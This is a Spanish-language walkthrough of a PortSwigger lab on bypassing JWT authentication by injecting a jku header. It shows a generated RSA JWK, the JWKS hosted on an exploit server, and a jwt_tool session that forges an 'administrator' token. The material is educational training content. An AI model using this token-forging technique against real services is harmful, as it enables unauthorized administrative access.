Lab 5: JWT authentication bypass via jku header injection
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection
Primero generamos una RSA Key con nuestra extension de Burp:
Copiamos el valor de la key:
{
"p": "-2zNrL29VeM4PqJnXu9QEvxq5AYkfZCkPB1IBoh6vVWo0v5xk-oLAsrSa6oT0yfBXa1FLyJC1CqbC8xCaQrY1ei_hAEF2puKdS0MeeU-aruBkYZRZT4iX4-R9XT1FcLJVQqss8d-jwYCJJEntxjMWrktBua0n1YDEtcglaJb0Yk",
"kty": "RSA",
"q": "6MucFLHMg1fMOXVT5VE1lpCFYzSyTl99LiaXlZQ3d4GuFrNcryJ4W0F2lWRs26xmGb47r4fQNZjxmLj0GNmPFaMco_Wxv1M97SUKnLPpKGfdBlWn2MS8CaRIPumNFiZEllVOUu7fUmeUcHLho478BBoeC5KDGxMWMi5G4OnkD5M",
"d": "BOFvj7BABdLLw5vX12KUrA1Bi-ruXhE9aph_9iBjstzQcHUOaRS1-O9_UmS5jdoNrCA3IbP2JZjjzpj-JLaX0uJAaYW35nxUfjAYcWd9jFokihNBrsN8NQz99VSLnvDazEJFOYavCFh0k-MNBd4xIfpjDevKbvvQTfSMF3f2ofjuDQA70RZw_qMy3QcpCYmTlNZAPi5Mth2jbCf_WlOngkrRo2T1weDTguUvDjhugQZsxChQ23vmSqVUN3-AdQnCwbxi1vITb9RoLRHdYa58kFKmd3MhaUSXocT6g8qW3-AmOphg3ub8rCzNn88TAinTO6X8se9N97kDDObQf7hj8Q",
"e": "AQAB",
"kid": "9c18e60f-cfa2-4858-8988-0f5f9b93426e",
"qi": "XDDFqQi2s5ug1VPz-PNkF4u-U7VXwh-yozyl-x7EaSAU-VP3pMMJFIxZ-SHQPa_3sZCN5sMmI-UIPzLp0Yvgi3rJ5p1jSBrSh16zWxecdX-_7Qikm30dorpOVbIiJfgAxzVDIJY9zqJOCZ0v1ilhTt6zm8eihdDtt97pH5AbpyQ",
"dp": "4tpdCUt5lhEaIoluM55B5Z-S4oMYUaM8THEvF5X1CPhNB3NFD2zQ2ogeK76dfJwWQGuiTNDg84YttwtpsFV1KCyFAJnbqk9FMkyfQSyykKL2WVOUBYF2ijqEO7B3olbKSc0D3oJVkr6dGFlQOEhLul_yXJO0zT9SLqGkaN7BceE",
"dq": "4Rc-q6PfI4BZL5WKsUh8kEDdOLdTUQRzfZRDLZZKq3rwYXK8Q3sI9POvPXQE7cMcVffiri6b27cuo4TyQLTb7QfyQXbnjx9l2U7fm_U5lKAYzm80BBz11DzMvkgE603FM7b4LKhbtsoAdVofYo52j2DRfE8GBb_Gzm6AiiidI5E",
"n": "5KKS9kRidf516xFIgURD0j1pERrzjnnGgwEEUsZTq-tgqtF_M5_w7ic03Q7P-s31DbQbbuhd-ZomVWsu-V09NIgDnk7x8oBFQ6FT5l6YlUL0JUrMN9eN6eUaOeqU26wkzSRR8Ppt-yYMI8wyrDsa7imLT2NtYqz560uVI1Ok3D6lzxBslo_m-BRMN5NjHyXMZNVkxRgahAx4UU71pwlHUCvl5A3JVRVHrCknvbYQoLi4fLgihCbCf5dp7r7TPNQ2HP7Ym5LkBormtUbuQgc7FgzxLPanqwkHXsiBux6Qo4X6hCPq8xe362NPCx4uanOJXX1GD9EN26U2u3PL6wRYqw"
}Creamos el jwks:
El body del exploit debe estar dentro de un array asi:
{
"keys": [
{
"p": "-2zNrL29VeM4PqJnXu9QEvxq5AYkfZCkPB1IBoh6vVWo0v5xk-oLAsrSa6oT0yfBXa1FLyJC1CqbC8xCaQrY1ei_hAEF2puKdS0MeeU-aruBkYZRZT4iX4-R9XT1FcLJVQqss8d-jwYCJJEntxjMWrktBua0n1YDEtcglaJb0Yk",
"kty": "RSA",
"q": "6MucFLHMg1fMOXVT5VE1lpCFYzSyTl99LiaXlZQ3d4GuFrNcryJ4W0F2lWRs26xmGb47r4fQNZjxmLj0GNmPFaMco_Wxv1M97SUKnLPpKGfdBlWn2MS8CaRIPumNFiZEllVOUu7fUmeUcHLho478BBoeC5KDGxMWMi5G4OnkD5M",
"d": "BOFvj7BABdLLw5vX12KUrA1Bi-ruXhE9aph_9iBjstzQcHUOaRS1-O9_UmS5jdoNrCA3IbP2JZjjzpj-JLaX0uJAaYW35nxUfjAYcWd9jFokihNBrsN8NQz99VSLnvDazEJFOYavCFh0k-MNBd4xIfpjDevKbvvQTfSMF3f2ofjuDQA70RZw_qMy3QcpCYmTlNZAPi5Mth2jbCf_WlOngkrRo2T1weDTguUvDjhugQZsxChQ23vmSqVUN3-AdQnCwbxi1vITb9RoLRHdYa58kFKmd3MhaUSXocT6g8qW3-AmOphg3ub8rCzNn88TAinTO6X8se9N97kDDObQf7hj8Q",
"e": "AQAB",
"kid": "9c18e60f-cfa2-4858-8988-0f5f9b93426e",
"qi": "XDDFqQi2s5ug1VPz-PNkF4u-U7VXwh-yozyl-x7EaSAU-VP3pMMJFIxZ-SHQPa_3sZCN5sMmI-UIPzLp0Yvgi3rJ5p1jSBrSh16zWxecdX-_7Qikm30dorpOVbIiJfgAxzVDIJY9zqJOCZ0v1ilhTt6zm8eihdDtt97pH5AbpyQ",
"dp": "4tpdCUt5lhEaIoluM55B5Z-S4oMYUaM8THEvF5X1CPhNB3NFD2zQ2ogeK76dfJwWQGuiTNDg84YttwtpsFV1KCyFAJnbqk9FMkyfQSyykKL2WVOUBYF2ijqEO7B3olbKSc0D3oJVkr6dGFlQOEhLul_yXJO0zT9SLqGkaN7BceE",
"dq": "4Rc-q6PfI4BZL5WKsUh8kEDdOLdTUQRzfZRDLZZKq3rwYXK8Q3sI9POvPXQE7cMcVffiri6b27cuo4TyQLTb7QfyQXbnjx9l2U7fm_U5lKAYzm80BBz11DzMvkgE603FM7b4LKhbtsoAdVofYo52j2DRfE8GBb_Gzm6AiiidI5E",
"n": "5KKS9kRidf516xFIgURD0j1pERrzjnnGgwEEUsZTq-tgqtF_M5_w7ic03Q7P-s31DbQbbuhd-ZomVWsu-V09NIgDnk7x8oBFQ6FT5l6YlUL0JUrMN9eN6eUaOeqU26wkzSRR8Ppt-yYMI8wyrDsa7imLT2NtYqz560uVI1Ok3D6lzxBslo_m-BRMN5NjHyXMZNVkxRgahAx4UU71pwlHUCvl5A3JVRVHrCknvbYQoLi4fLgihCbCf5dp7r7TPNQ2HP7Ym5LkBormtUbuQgc7FgzxLPanqwkHXsiBux6Qo4X6hCPq8xe362NPCx4uanOJXX1GD9EN26U2u3PL6wRYqw"
}
]
}Luego de lo anterior, modificamos el JWT y lo firmamos:
El resultado final es el siguiente:
El JWT final queda asi:
Utilizando JWT_TOOL
Ejecutamos el siguiente comando:
┌──(root㉿SPARTAN-SERVER)-[/home/hacker/BURP/jwt_tool]
└─# python3 jwt_tool.py eyJraWQiOiJiNjRhYThjYy01NmY5LTRlNzQtODE2My04ZmMyNTUwM2E1MmUiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNzQ2OTcxMywic3ViIjoid2llbmVyIn0.VxY8S44qihjURqTa00DJbKlmPxktWH8r02CdNjBMHkCQOYRWDq1ydQEZkY82b5h63XFX7RJ8rWHPbDF9MlV84LvIOl-pmiPt-Pd6F73JIuwECjMfQjMDnzpa9Wb0P_KCsFqSRK2VA5U6Yxr7g3fNx4q9tk0EH3rCqro3KTauFHHkXELoB4u6DOU9Ue6YguHygf2xJzPjnXnoqX_lxVF5ToGcSPgPeToJO67ObvBZHTybw886YVb0gxMKjVpQqGpxaAY2sVB7sgFT1GzzaMs7H120SKqcpsTYIkSPVHLKzusbpWW19jRYycQBVOWbfqHBTMapvi9en-FMjK8COGMtgg -X s -ju https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json -T
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.7 \______| @ticarpi
Original JWT:
====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================
Token header values:
[1] kid = "b64aa8cc-56f9-4e74-8163-8fc25503a52e"
[2] alg = "RS256"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 1
Current value of kid is: b64aa8cc-56f9-4e74-8163-8fc25503a52e
Please enter new value and hit ENTER
> jwt_tool
[1] kid = "jwt_tool"
[2] alg = "RS256"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
Token payload values:
[1] iss = "portswigger"
[2] exp = 1717469713 ==> TIMESTAMP = 2024-06-03 21:55:13 (UTC)
[3] sub = "wiener"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 3
Current value of sub is: wiener
Please enter new value and hit ENTER
> administrator
[1] iss = "portswigger"
[2] exp = 1717469713 ==> TIMESTAMP = 2024-06-03 21:55:13 (UTC)
[3] sub = "administrator"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
Paste this JWKS into a file at the following location before submitting token request: https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json
(JWKS file used: /root/.jwt_tool/jwttool_custom_jwks.json)
/root/.jwt_tool/jwttool_custom_jwks.json
jwttool_a9bbfc25f396c70765690e2419b03758 - Signed with JWKS at https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json
[+] eyJraWQiOiJqd3RfdG9vbCIsImFsZyI6IlJTMjU2Iiwiamt1IjoiaHR0cHM6Ly9leHBsb2l0LTBhMDQwMDViMDQwOTRmNDM4MGE1NzU3MDAxMzkwMGViLmV4cGxvaXQtc2VydmVyLm5ldC9qd2tzLmpzb24ifQ.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNzQ2OTcxMywic3ViIjoiYWRtaW5pc3RyYXRvciJ9.gi-MLU-HNg0IE5G1txdAoFaBIH5sI8MPnG39RcRp-Oo6w72Akl6e2pEhP-Nt2RsPGf5hsnecEyB1LLpmxXqx1feYh2SZVSBTU1QmgkjfJz95J_sVh9ZNVGqRiHjAvnQLNhBBE4a3F3sZTiUJHvLDPza880FlbCLVHR4f57TAUNzqt1Ed-jXUYANXx4RDqnnkh-g6PIpLQ3ZUsXyLIYwmdAwgGthqFlihMtGxAd0uRpJZScvYtefyzOdmd9K5mzpJgvixOe6WaShdmZ1Dk8olDvrbGpaHiPkvb3zPaMuKLc7V9-F7zbluL7UfbwwzQJjU749tmvdGgOIJPD1y-2pLfQLuego de lo anterior, hay que modificar el exploit:
┌──(root㉿SPARTAN-SERVER)-[/home/hacker/BURP/jwt_tool]
└─# cat /root/.jwt_tool/jwttool_custom_jwks.json
{
"keys":[
{
"kty":"RSA",
"kid":"jwt_tool",
"use":"sig",
"e":"AQAB",
"n":"pj6JLmRpdPRRPuh7RS2ir3CcDrmwILr4Ffj-AR0VCCN-hbN_R2RquIlVeP7bOTMhSYk2SG0Jvnmjkr0i3sMVMTi64L3vRDEuY3e7O1bRjFrrfKw4hNn5svGf-xN74JnPFJEqvvIEyek-BX5eo7sHlP1maDta3H98RX0BckNxjRS0eXfyxG_q-K75DD6SNX-hxR00Wx60KXkLV5WvCKN-b34uMc_TXN3jBZO2xpQ1l7WlJ1fFis9-miF222oZ9irsf1OY4B66JBi_0QbOv67l_YhM1j_uwgmE4NOIYA2VpiHQjHBinFan8WNjDOXKAoy3_Kf0QtnTjOWUWQ08SkUzWQ"
}
]
}Modificamos el exploit:
Y listo:
El JWT final quedo asi:
Última actualización
